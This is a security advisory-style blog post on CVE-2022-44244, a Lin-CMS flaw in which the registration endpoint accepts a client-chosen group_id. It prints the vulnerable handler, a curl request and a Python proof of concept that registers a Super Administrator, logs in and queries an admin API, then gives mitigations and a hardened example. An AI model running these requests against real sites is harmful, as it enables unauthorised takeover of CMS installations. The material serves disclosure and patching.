If you use Lin-CMS, a popular content management system for developers, you need to know about CVE-2022-44244. This serious vulnerability in version .2.1 could let attackers bypass authentication and take over the Super Administrator account, giving them total control of the system.
In this exclusive deep dive, we’ll explain how this works, show code snippets, and share real exploit details. If your site runs Lin-CMS, you’ll want to read on.
What is CVE-2022-44244?
Lin-CMS (especially the Flask-based backend) introduced an authentication bug in version .2.1. It allows anyone to skip the login process by manipulating certain API requests and then escalate their privileges to those of a Super Administrator. The root cause is insufficient checks in the login and authorization logic.
Short version:
Attackers can become Super Administrator without having valid login credentials.
Why Is This Bad?
* Super Administrators control all data, users and site settings.
* Attackers can add/remove other users, steal sensitive data, or plant malware.
* No complex skills are needed; a simple API request can trigger the bug.
References
- NVD entry for CVE-2022-44244
- Github Issue (original report - Chinese)
- Chinese security forum write-up
The Technical Details
Lin-CMS uses JWT (JSON Web Token) for authentication. In v.2.1, the login and privilege-checking logic did not properly verify user identity before allowing access to admin-level APIs.
Vulnerable Code Example
The problem is in the /cms/user/refresh and /cms/user/register endpoints. Consider this simplified handler:

# handlers/user.py
@bp.route('/register', methods=['POST'])
def register():
    json = request.get_json()
    identity = json.get('identity')
    password = json.get('password')
    group_id = json.get('group_id')  # taken straight from the client
    # ... missing checks here: no authentication, no validation of group_id
    user = User.create(identity=identity, password=password, group_id=group_id)
    ...
Because there are no checks on who is registering, anyone can create an account with any role. Even worse, if you specify the Super Admin group (usually ID=1), you gain full control.
The backend trusts whatever group_id you POST, like this:

{
    "identity": "evilhacker@example.com",
    "password": "Passwrd!!",
    "group_id": 1
}
How to Exploit
Step 1:
Send a registration POST request with group_id set to 1.
Example with curl
curl -X POST http://target.com/cms/user/register \
-H "Content-Type: application/json" \
-d '{"identity":"attacker@example.com", "password":"StrongPass#1", "group_id":1}'
Step 2:
Log in as that user. Get the JWT access token from /cms/user/login.
Step 3:
Access any admin API, e.g.:
- Add/delete users
Here is a minimal proof-of-concept in Python (using requests):

import requests

base_url = 'http://target.com'

# Step 1: register an account with the Super Administrator group ID
register = requests.post(
    base_url + '/cms/user/register',
    json={
        'identity': 'evilhacker@example.com',
        'password': 'HackedByMe!123',
        'group_id': 1  # Super Administrator group
    }
)
print("Register status:", register.status_code)

# Step 2: log in as that user to obtain a JWT access token
login = requests.post(
    base_url + '/cms/user/login',
    json={
        'identity': 'evilhacker@example.com',
        'password': 'HackedByMe!123'
    }
)
print("Login status:", login.status_code)
token = login.json().get('access_token')

# Step 3: call an admin-only API with the token (list all users)
headers = {'Authorization': f'Bearer {token}'}
users = requests.get(base_url + '/cms/user/', headers=headers)
print(users.json())
Mitigation
- Upgrade Lin-CMS immediately to the latest version (Github).
- Disable self-registration or require admin approval for new accounts.
- Rotate all sensitive tokens and audit current Admin/Super Admin users.
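To make the fix concrete for both the vulnerable handler above and the mitigation list, here is an added example (not Lin-CMS's own code) that puts the trusting pattern beside a hardened registration routine which assigns the group from server-side policy. The `Actor` type, `DEFAULT_GROUP_ID = 2` and the function names are assumptions for illustration; only the Super Administrator group ID of 1 comes from the page.

```python
# Constructed example (not Lin-CMS code): the trusting pattern beside a
# hardened version that assigns the role from server-side policy.
from dataclasses import dataclass
from typing import Optional

SUPER_ADMIN_GROUP_ID = 1  # the privileged group the page says is "usually ID=1"
DEFAULT_GROUP_ID = 2      # hypothetical unprivileged group for self-registration


@dataclass
class Actor:
    """The authenticated caller; None is passed for anonymous self-registration."""
    identity: str
    group_id: int


class RegistrationError(Exception):
    pass


def register_vulnerable(payload: dict) -> dict:
    """Mirrors the bug: whatever group_id the client POSTs is stored as-is."""
    return {"identity": payload["identity"], "group_id": payload.get("group_id")}


def register_hardened(payload: dict, actor: Optional[Actor] = None) -> dict:
    """Assign the group from policy, never from the request body alone.

    Anonymous self-registration always gets DEFAULT_GROUP_ID, and a supplied
    group_id is rejected rather than silently dropped, so the attempt surfaces
    as an error that can be logged. Only an authenticated Super Administrator
    may pick a group, and even then this endpoint will not create another
    Super Administrator.
    """
    identity, password = payload.get("identity"), payload.get("password")
    if not identity or not password:
        raise RegistrationError("identity and password are required")
    requested = payload.get("group_id")
    if actor is None or actor.group_id != SUPER_ADMIN_GROUP_ID:
        if requested is not None:
            raise RegistrationError("group_id may not be set on self-registration")
        return {"identity": identity, "group_id": DEFAULT_GROUP_ID}
    if requested == SUPER_ADMIN_GROUP_ID:
        raise RegistrationError("cannot create another Super Administrator here")
    return {"identity": identity,
            "group_id": DEFAULT_GROUP_ID if requested is None else requested}
```

The same rule applies to any other endpoint that writes a role field (the page also names /cms/user/refresh): the role must come from the server's own record of who is calling, not from the request body.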
In Summary
CVE-2022-44244 in Lin-CMS v.2.1 is a dangerous bug that allows attackers to become Super Administrators and take over your website. This can be done through a simple API request, with no authentication required. Patch your installation, and always review permission logic before using open source CMS software.
Stay safe!
For more technical alerts and exclusive security reviews, follow us on Github and subscribe for updates.
Timeline
Published on: 11/09/2022 22:15:00 UTC
Last modified on: 11/17/2022 14:35:00 UTC